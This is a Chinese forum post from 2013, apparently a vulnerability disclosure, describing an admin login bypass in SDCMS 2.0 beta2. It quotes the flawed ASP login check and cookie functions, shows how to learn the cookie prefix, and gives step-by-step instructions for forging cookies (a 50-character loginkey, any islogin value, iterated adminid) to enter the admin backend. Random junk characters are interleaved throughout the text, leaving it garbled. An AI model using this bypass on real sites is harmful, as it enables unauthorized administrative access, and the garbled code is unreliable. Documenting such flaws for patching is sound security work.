要描述:2 i( v! S; X, |" s9 |* u# l+ b
5 ^& R a, n$ j0 T _4 Q
SDCMS后台绕过直接进入:测试版本2.0 beta2 其他版本未测试5 X+ ?, S- G# m6 X" j
详细说明:
, z8 U L( d: k8 mIslogin //判断登录的方法
. _4 C8 m: Q+ a( p6 X
% L2 V" P' k- L& q _+ f. Hsub islogin()
" h/ L' G' M' V2 f0 J% e- R, ^ , a* I; _& K2 r7 q2 ?- i
if sdcms.strlen(adminid)=0 or sdcms.strlen(adminname)=0 then - b7 K/ |8 Q7 n- q& M# h
; w3 f4 K, Q1 b) H+ r% p% e1 O2 @* a0 B
dim t0,t1,t2 B" I$ Z: i t4 Q
# O; U0 \% u' p* t* g* N9 ^
t0=sdcms.getint(sdcms.loadcookie("adminid"),0) loadcookie 5 b) j# M/ l X5 u2 N: a, p
2 ]3 n: `, \2 b" ot1=sdcms.loadcookie("islogin")3 k/ h4 `. s V) u+ P0 z# g
+ i- W. b/ J9 o+ O4 y- w/ Ct2=sdcms.loadcookie("loginkey")
) j1 P9 M0 _- H0 u, L) T5 B
) W* E: S% _7 g- R, N5 t0 Y% jif sdcms.strlen(t0)=0 or sdcms.strlen(t1)=0 or sdcms.strlen(t2)<>50 then //这里判断很坑爹 sdcms.strlen(t2)<>50 loginkey 没有任何要求 只需要输入50个即可往下执行9 E4 @- ^, n% u8 g
6 h* c" S. z9 N' ^: x$ g//
; X/ x y7 Z, \% ` _( b4 s) ^5 A7 _
sdcms.go "login.asp?act=out"- @. q4 [* {8 W) {8 A; k) u
5 `2 K# p3 P" v" g% K+ Oexit sub6 G' M8 Z# t: O0 m* s) z
2 h- W) @0 K! S3 P7 xelse
- N# K3 n: F7 z: {5 W' @# k
$ P3 j" p+ G( j" U- f2 F" u9 ndim data: D2 L7 w6 ^; r$ F- F/ I/ p
% d% g0 c$ ?2 t0 Vdata=sdcms.db.dbload(1,"adminid,adminname,adminpass,islock,groupid,g.pagelever,g.catearray,g.catelever","sd_admin u left join sd_admin_group g on u.groupid=g.id","adminid="&t0&"","") //根据管理员ID查询 ID可控' d) K' d& x2 c) q$ S% q: A+ |
, y, g6 G# t; K7 {
if ubound(data)<0 then
6 y7 q B8 D; X! [+ C2 o
1 i$ A4 |- }/ |* i8 osdcms.go "login.asp?act=out"5 h( O. e* c1 K/ L$ U* |! ~5 ^3 c
. `) J/ b' Q& Nexit sub0 v& \! ~4 Z3 w3 F7 [
7 J: O8 E% l- g9 o* H* F- J! ~+ Eelse
; ^9 ^" f& a4 O) d. H3 I
3 |# B" \4 U# z% C( p( Uif instr(data(1,0)&data(2,0),sdcms.decrypt(t1,t2))<0 or data(3,0)=0 then
2 k$ P D( P. s& _8 i( N
! [& s) h8 ]# K$ e0 O( Ksdcms.go "login.asp?act=out"
7 Y# X2 \' X) M/ ]. c
0 S/ E6 @4 u7 z2 w* K* C# mexit sub/ e$ ~) t8 }8 m1 x, v
' p% Z1 C. w# p6 E$ f6 Z' t
else( T) K6 M5 S: ?$ ? X
4 t/ L0 U$ z X6 D2 I
adminid=data(0,0)
* R1 }, v3 ]* }- a R; p6 L; h % w; U- N2 G* W% i! C
adminname=data(1,0)' s, g( C) ]- a- `4 r
. [, Q; B" q3 E8 H% ^) n/ G' y
admin_page_lever=data(5,0)+ L9 m3 `! ]# i a! @
! a1 o' y* Z" W9 A
admin_cate_array=data(6,0)
7 A; j5 p) a1 Y' P1 D " l6 n* B+ s) l% z8 g$ K; w' B" x. ]
admin_cate_lever=data(7,0)
) F- l6 [4 x1 N* T9 Z8 m 7 |4 P, ` a, A# r: _
if sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0' B( m4 C2 Q5 P: o* ]5 o
+ H$ \. L% v9 |if sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0
' P6 i: f+ z" i 1 D$ Y! e8 n! |# T" [
if sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0- A! S9 [8 S! K# ^. L
! F" W! P5 h% `8 H+ \
if clng(admingroupid)<>0 then2 S* S v& Q2 `- Q
9 C3 Q* n- T4 ]5 P$ p4 Hadmin_lever_where=" and menuid in("&admin_page_lever&")"8 W# h! w( ~% E8 { D: _& t$ p& W, M
7 {' i6 e. `. j* I
end if; ^( s2 x, T8 P( [7 s3 C
3 o' F1 z( Y. T& usdcms.setsession "adminid",adminid8 x8 d2 q$ t% |$ D
$ Z% i- ], R B; s" r# N5 jsdcms.setsession "adminname",adminname; d+ _; @: y$ Y
p$ P& D7 l; C# c" F, b! s
sdcms.setsession "admingroupid",data(4,0)
/ X: _9 O* V& ?# T1 J( a, p4 a 4 [7 u+ s5 I: d- O
end if
7 u' O& c2 F/ m8 ]* q' H s! p
# d. b- p( R2 _! J! r6 kend if6 O8 x4 r- z% R0 u; W
) G$ {6 k) O, r/ y/ D% K
end if
! W5 A0 J+ S$ |+ w
0 ?( ]( H" Y1 |# c kelse
8 Z9 e" n, U# ]: T0 J5 E3 v
! e6 a/ X0 E O% F* B/ R( ?# Edata=sdcms.db.dbload(1,"g.pagelever,g.catearray,g.catelever","sd_admin u left join sd_admin_group g on u.groupid=g.id","adminid="&adminid&"","")4 |* U0 o u" v9 A
4 ~' ]: b5 e5 A+ N2 Lif ubound(data)<0 then% e- g! j' ?1 G! k
8 ~0 f" m6 Z: J! B$ P8 `, Isdcms.go "login.asp?act=out"
0 }3 z5 z2 @# Q4 g+ ? 9 p+ O, P4 H5 h5 I
exit sub* c' U3 g! `! D. ^) c, o
/ I) v1 i; T. h, b2 v ]/ C" V5 felse1 z' H$ |3 n$ `7 n
: v. y( a Z U7 r
admin_page_lever=data(0,0)
1 |8 ^( B, I% f; P! A' T
$ q+ }) h; ~2 D0 A& _1 Z, Padmin_cate_array=data(1,0)& Z3 y& a- A% y: w: O( x
! N9 F( N: A+ E, i" [
admin_cate_lever=data(2,0)
+ D, s" F1 l2 d
# H8 F( b' ]( tif sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0
* I# T, m; \# Y# t/ D; z, L ; b& F& D. ?% R) J
if sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0
% Q8 ~. P8 R+ v% q9 {$ o
2 k( `8 ^9 n9 \) Y6 T, yif sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0! P/ X9 ]' _/ ~; W. F' z: t
4 z9 w6 R3 W- ]- @) x! U
if clng(admingroupid)<>0 then
5 a& l% s$ O6 U1 ]% ] ! G! @( h* v+ B# O
admin_lever_where=" and menuid in("&admin_page_lever&")". w7 @4 R, u1 v* M) h1 y
* j x- S( B6 U X v: ^end if) i6 T- o1 \' `
# y' ~. p: w \2 b/ D: ^
end if
2 A* R0 l* N+ L
9 I5 `* d* F/ [3 X( s. gend if1 w9 l0 n& S3 _; O8 y W+ G+ a
I* @4 ]3 q: q0 s
end sub4 Z# u; R$ \& J+ F5 d& T
漏洞证明:% c3 A- r2 R* C( j4 A, g
看看操作COOKIE的函数
/ \ D# M# @# [$ t
" \- ? ~, |2 `; K1 | C* S7 Cpublic function loadcookie(t0)
/ P, ^ P; T. z2 a1 d, C
* N2 b( E- Q) Eloadcookie=request.cookies(prefix&t0)
& Q% v: M3 J7 U& E; } + B1 L- d6 L/ {6 c
end function
9 ?) x* d8 y. y: m# h: L V4 W
" g3 \; s; r, v! jpublic sub setcookie(byval t0,byval t1)
$ A/ i9 T$ C K& o
3 t4 p$ j8 ^+ [: {( i" [0 Q: zresponse.cookies(prefix&t0)=t1. Y$ k; w1 f% N5 n7 e
- r+ n" E6 Q! o3 I9 Q4 ?2 l
end sub
# w6 T! L0 ` J 7 L, Y/ T& q [& M% k- X6 l
prefix
, `+ t3 b3 E+ O' ?) V ( \; k7 _2 P7 v
'变量前缀,如一个空间下多次使用本程序的话,请每个程序配置不同的值. q4 p7 p% `& d* E
8 l& N( m& Y( E0 K& O: h4 Sdim prefix+ w) ?3 v ^- J! D) K- o
% w* ]; _% @* I" E6 E
prefix="1Jb8Ob"
9 F+ k/ x% ^9 p1 R" N
\$ h+ }8 `! {; ^. j3 w6 a1 q3 M'这个值访问一下admin/login.asp?act=out 便可得到 在COOKIE里 1 L Z" G( D( x* d, a
& D0 e" F, k# m. }& J& Dsub out
9 r; n4 L! N0 Z# t& J
$ L6 S* _9 u; Usdcms.setsession "adminid",""1 a. Q) P E# N: Q; ]- {0 \3 w
3 P, V. ~' F4 N: v% O8 |$ Isdcms.setsession "adminname",""
! ]0 P' F* \' W @+ _
* [0 U! X. D5 ~% C- Ksdcms.setsession "admingroupid",""5 V0 Q! q7 I" I8 o0 F- l
5 O1 t, G5 x. _1 k7 G4 gsdcms.setcookie "adminid",""
) B; O b( b0 b# l. ?8 w7 ~ 7 N9 q4 I! o% z9 x1 B/ {
sdcms.setcookie "loginkey",""
, [8 f- i* Q. J' Q7 Q 8 k% c- X# X1 q \
sdcms.setcookie "islogin",""2 ]* }- X& K- n: X
& A- ]( d2 I7 _0 c7 V/ E
sdcms.go "login.asp"
1 S/ t# b" N+ l { % B' g: K9 {" Z. i+ d6 }- ?( s
end sub
' S4 H% _: s# A 8 M: r3 o% ]7 `2 Y3 w
# w7 y" w/ V; L5 q0 g, |0 U利用方法:设置cookie prefixloginkey 50个字符 prefixislogin 随意 循环下prefixadminid 即可 默认1 然后访问后台,就可以了!
M* N. b3 o. Q4 h修复方案:
$ p3 \9 e; f: C6 B3 k! \3 ^修改函数!* ?6 J( W" s# E: |* _8 O! h2 T
|
发表于 2013-7-26 12:42:43
收藏
支持
反对